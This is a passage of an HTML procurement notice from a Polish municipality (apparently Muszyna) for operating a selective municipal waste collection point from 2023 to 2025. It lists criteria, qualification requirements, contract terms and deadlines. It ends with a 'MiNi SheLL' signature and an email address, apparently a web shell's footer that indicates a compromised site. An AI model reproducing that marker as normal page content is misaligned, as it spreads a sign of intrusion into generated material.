- liczba punktów otrzymana za kryterium okres gwarancji zaoferowany w ofercie</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Standardy środowiskowe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 4)	Zdolności technicznej lub zawodowej – Zamawiający uzna, że warunek ten został spełniony jeżeli Wykonawca wykaże, że:<br/>a) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał lub nadal wykonuje w sposób ciągły co najmniej jedną usługę o charakterze i złożoności porównywalnej z zakresem zamówienia, tj. której przedmiotem było lub jest świadczenie usługi w zakresie prowadzenia punktu selektywnego zbierania odpadów komunalnych wraz z przekazaniem do zagospodarowania przyjmowanych odpadów komunalnych przez okres co najmniej 12 miesięcy następujących po sobie.<br/>b)	Zamawiający uzna, że warunek ten został spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował na czas realizacji zamówienia wskazanym potencjałem technicznym:<br/>•	przynajmniej jednym samochodem ciężarowym o ładowności do 3,5 tony do odbioru selektywnie zebranych odpadów komunalnych, spełniającym wymagania normy emisji spalin co najmniej Euro 3,<br/>•	przynajmniej jednym pojazdem specjalnie przystosowanym do odbioru selektywnie zebranych odpadów komunalnych z dźwignią hakową (hakowiec) spełniającym wymagania normy emisji spalin co najmniej Euro 3. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego – załącznik nr 6 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie potwierdzających wykonanie co najmniej jednej usługi wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie potwierdzających spełnianie warunku opisanego w Rozdziale I, Podrozdział 5 ust. 5.4 pkt 4 ppkt a) – druk wykazu stanowi załącznik nr 7 do SWZ.<br/>Uwaga:<br/>Dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny <br/>o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br/>W przypadku podania wartości usług w walucie innej niż zł, w celu oceny spełniania ww. warunku Zamawiający dokona przeliczenia wskazanej kwoty na zł według średniego kursu Narodowego Banku Polskiego obowiązującego w dniu publikacji ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych.<br/>b)	wykaz sprzętu, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy usług w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami potwierdzających spełnienie warunku opisanego w Rozdziale I, Podrozdział 5 ust. 5.4 pkt 4 ppkt b)– druk wykazu stanowi załącznik nr 8 do SWZ,</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza zmiany umowy. <br/>Z uwagi na ograniczenia techniczne co do możliwości zastosowania znaków rodzaj i zakres zmian określono w załączniku nr 3 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-20 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/muszyna</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-20 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-01-18</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykluczeniu podlega również Wykonawca o którym mowa w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U z 2022 poz. 835).<br/><br/>Wymagany termin realizacji zamówienia: od 01.01.2023 r. do 31.12.2025 r tj. 36 miesięcy.<br/><br/>Szczegółowe wymagania dot. opisu przedmiotu zamówienia i warunków jego wykonania określono w SWZ i załącznikach stanowiących jego integralną część.

Creat By MiNi SheLL
Email: jattceo@gmail.com